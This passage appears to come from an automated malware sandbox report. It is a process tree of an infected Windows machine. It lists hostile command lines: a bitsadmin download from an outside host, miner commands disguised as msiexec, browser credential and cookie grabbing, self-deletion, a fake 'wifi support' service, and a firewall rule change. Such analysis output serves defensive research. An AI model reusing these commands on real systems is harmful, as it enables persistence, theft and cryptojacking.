                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
                                                                                                                                                                                                                            parse.exe -f json -b chrome
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:5904
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
                                                                                                                                                                                                                              parse.exe -f json -b firefox
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:2788
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fyljel13.oh4\y1.exe & exit
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:4132
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fyljel13.oh4\y1.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\fyljel13.oh4\y1.exe
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:5920
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\WGqeIssBuI.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\WGqeIssBuI.exe"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:5816
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1619118338462.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1619118338462.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619118338462.txt"
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:5608
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\WGqeIssBuI.exe"
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:5140
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                          ping 127.0.0.1 -n 3
                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                          PID:1472
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oqtq23c4.dse\ABCbrowser.exe /VERYSILENT & exit
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:5724
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\oqtq23c4.dse\ABCbrowser.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\oqtq23c4.dse\ABCbrowser.exe /VERYSILENT
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:5264
                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:5428
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gg0sefj5.hmc\toolspab1.exe & exit
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:5660
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gg0sefj5.hmc\toolspab1.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\gg0sefj5.hmc\toolspab1.exe
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:5348
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gg0sefj5.hmc\toolspab1.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\gg0sefj5.hmc\toolspab1.exe
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:5432
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d51vcc3y.bvg\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:4660
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\d51vcc3y.bvg\SunLabsPlayer.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\d51vcc3y.bvg\SunLabsPlayer.exe /S
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                              PID:5448
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl7C8D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:5752
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl7C8D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                    PID:5284
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl7C8D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:5768
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl7C8D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:3588
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl7C8D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                          PID:5372
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl7C8D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                            PID:6624
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl7C8D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                              PID:7064
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                                                                                              PID:6584
                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l4i0hp5r.n3s\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:3728
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w0jurwf3.ugu\inst.exe & exit
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:4116
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\w0jurwf3.ugu\inst.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\w0jurwf3.ugu\inst.exe
                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                  PID:4688
                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\20lxof2n.ztw\c7ae36fa.exe & exit
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:5548
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\20lxof2n.ztw\c7ae36fa.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\20lxof2n.ztw\c7ae36fa.exe
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                      PID:5636
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:4700
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1332.tmp.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1332.tmp.exe"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              PID:2404
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1332.tmp.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1332.tmp.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                PID:4592
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1518.tmp.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1518.tmp.exe"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              PID:4660
                                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w12897@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:3344
                                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w25875 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                  PID:2832
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:4296
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                    ping 127.0.0.1
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                    PID:4764
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                PID:5060
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:696
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:6080
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:4216
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:4388
                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                PID:1968
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:2960
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                PID:4300
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                PID:2980
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                PID:6040
                                                                                                                                                                                                                                                              • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:2484
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:4260
                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4624
                                                                                                                                                                                                                                                                    • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:6028
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4AF7.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4AF7.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:6696
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4CEC.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4CEC.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:6056
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\58B5.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\58B5.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:7080
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 868
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                PID:5020
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 904
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                PID:6464
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 924
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                PID:5472
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 1064
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                PID:6484
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 1124
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                PID:5564
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 1136
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                PID:4736
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 1116
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                PID:6880
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 1204
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                PID:5440
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5D2A.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5D2A.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:6460
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\61FE.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\61FE.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:6684
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\652B.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\652B.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:6760
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hwuboywd\
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:6704
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fdmnwshd.exe" C:\Windows\SysWOW64\hwuboywd\
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:5396
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" create hwuboywd binPath= "C:\Windows\SysWOW64\hwuboywd\fdmnwshd.exe /d\"C:\Users\Admin\AppData\Local\Temp\652B.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:7076
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" description hwuboywd "wifi internet conection"
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:5668
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" start hwuboywd
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:2084
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:6224
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6BD3.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\6BD3.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:6664
                                                                                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:7016
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7B16.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7B16.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:6892
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\647349126.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\647349126.exe"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:4164
                                                                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:5832
                                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:5596
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1371397063.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1371397063.exe"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:5224
                                                                                                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:964
                                                                                                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:5480
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7FDA.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7FDA.exe
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:6588
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8337.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\8337.exe
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:6680
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8CEC.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8CEC.exe
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:7128
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\hwuboywd\fdmnwshd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\hwuboywd\fdmnwshd.exe /d"C:\Users\Admin\AppData\Local\Temp\652B.exe"
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:6384
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                            svchost.exe
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:6348
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A47C.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A47C.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:6688
                                                                                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
